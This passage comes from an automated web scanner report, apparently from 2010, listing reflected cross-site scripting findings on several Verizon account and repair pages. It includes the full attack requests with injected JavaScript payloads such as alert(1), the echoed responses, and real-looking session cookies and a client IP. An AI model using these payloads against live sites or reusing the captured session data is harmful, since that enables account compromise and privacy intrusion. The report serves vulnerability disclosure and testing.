ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 22604
Expires: Sat, 20 Nov 2010 02:33:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:33:26 GMT
Connection: close
Set-Cookie: EOrdering=PN-DR-ENABLED=iVwfNps%2fXq8%3d&PROJNORTH-CLIENT=&WR58038_DC=efZHv8OIFvI%3d&HBXSOURCE=TiFI0EpTTVOnzjDD4KXHGQ%3d%3d; domain=.verizon.com; path=/


<script language="javascript">    vzLogging_appName = "eOrdering";</script>

<script language="javascript" src="../Common/includes/js/pagetracker.js"></script>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD
...[SNIP]...

//End

//Changes made for Project North - if condition added
if ( PostDataToDifferentDataCenter != "Y" )
{

//FlowRoute = "NB-NS89a05
alert(1)//cc561db1e96
";
FlowRoute = ("NB-NS89a05
alert(1)//cc561db1e96");


               locationHref ="RegistrationBridgeProcess.aspx?txtAppId=" + "" + "&from=" + "" + "&FlowRoute=" + Flo
...[SNIP]...

2.832. https://www22.verizon.com/ForYourHome/MyAccount/Protected/Account/MyAccountOverview.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /ForYourHome/MyAccount/Protected/Account/MyAccountOverview.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80fcb"%3b2377e162d0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80fcb";2377e162d0b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ForYourHome/MyAccount/Protected/Account/MyAccountOverview.aspx?80fcb"%3b2377e162d0b=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sun, 21 Nov 2010 18:10:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDCASDBDTB=KCIMIEFBKACDJBJJCJAANNIP; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66845525d5f4f58455e445a4a423660;path=/
Content-Length: 128924

<!-- Vignette V6 Sun Nov 21 10:10:56 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
rMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www22.verizon.com/ForYourHome/MyAccount/Protected/Account/MyAccountOverview.aspx?80fcb";2377e162d0b=1';
<!-- Vignette V6 Sun Nov 21 10:10:56 2010 -->
...[SNIP]...

2.833. https://www22.verizon.com/ForYourHome/MyAccount/Protected/Services/MyServices.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /ForYourHome/MyAccount/Protected/Services/MyServices.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37328"%3b82d1bb06d82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 37328";82d1bb06d82 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ForYourHome/MyAccount/Protected/Services/MyServices.aspx?37328"%3b82d1bb06d82=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:49:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66445525d5f4f58455e445a4a423660;path=/
Content-Length: 129022

<!-- Vignette V6 Fri Nov 19 18:49:19 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
d="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www22.verizon.com/ForYourHome/MyAccount/Protected/Services/MyServices.aspx?37328";82d1bb06d82=1';
<!-- Vignette V6 Fri Nov 19 18:49:19 2010 -->
...[SNIP]...

2.834. https://www22.verizon.com/ForYourHome/VZRepair/vziha/Service.aspx [ihaweb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForYourHome/VZRepair/vziha/Service.aspx

Issue detail

The value of the ihaweb request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3542e'-alert(1)-'f6988e7adc8 was submitted in the ihaweb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ForYourHome/VZRepair/vziha/Service.aspx?ihaweb=WebNoDialTone3542e'-alert(1)-'f6988e7adc8 HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://www22.verizon.com/residentialhelp/phone
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TX; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; IHAClientIP=112.64.2.103; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; amlbcookie=05; lob=consumer; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; NSC_xxx22_tqmbu_mcw=ffffffff895bc67f45525d5f4f58455e445a4a423660; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; CMS_TimeZoneOffset=360; CP=null*; refURL=http://www22.verizon.com/residentialhelp/phone; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 21 Nov 2010 18:02:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sun, 21 Nov 2010 18:02:59 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADAALgAzAC4AMgAyADkALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; expires=Mon, 22-Nov-2010 18:02:58 GMT; path=/
Set-Cookie: vzinhomeagent=GUID=MQAzADUAMQAzADkAMAA1AC0ANgBmADkANgAtADQANgBlAGEALQA4ADgAMQAzAC0AMgBkAGUAYQA5ADQAMgA1AGUANAA5ADUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADkAMgA5ADYANwA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQAzADUANAAyAGUAJwAtAGEAbABlAHIAdAAoADEAKQAtACcAZgA2ADkAOAA4AGUANwBhAGQAYwA4AA==&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQAzADUANAAyAGUAJwAtAGEAbABlAHIAdAAoADEAKQAtACcAZgA2ADkAOAA4AGUANwBhAGQAYwA4ADwALwBUAGUAeAB0AD4APAAvAFUAcwBlAHIAVABlAHgAdAA+AA==&AccountIDAuthMode=bgBvAA==; expires=Sun, 21-Nov-2010 18:12:58 GMT; path=/
Set-Cookie: NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6c145525d5f4f58455e445a4a423660;path=/
Set-Cookie: ak-sf=false; expires=Sun, 21-Nov-2010 18:07:59 GMT; path=/foryourhome/; domain=verizon.com
Content-Length: 302526


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Verizon | Resi
...[SNIP]...
r mylocation = document.location.toString();
var spanishurlvalue='espanol.verizon.com/enes';
spanishurlvalue=spanishurlvalue.toLowerCase();
setCookie("BPSPANISH", "N");
var keyword = 'webnodialtone3542e'-alert(1)-'f6988e7adc8';
switch (keyword)
{
case "webstbreset": case"webstbfrozen": case "webchunavail": case"webnopicture": case "webprogramremote":
document.getElementById("VZHeader1_HdnPageUrl").value="/vz
...[SNIP]...

2.835. https://www22.verizon.com/ForYourHome/ebillpay/code/MyVerizon2/Code/paymentoptions.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www22.verizon.com
Path:   /ForYourHome/ebillpay/code/MyVerizon2/Code/paymentoptions.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71f4e"%3b9ffd29efbfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 71f4e";9ffd29efbfb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ForYourHome/ebillpay/code/MyVerizon2/Code/paymentoptions.aspx?71f4e"%3b9ffd29efbfb=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; 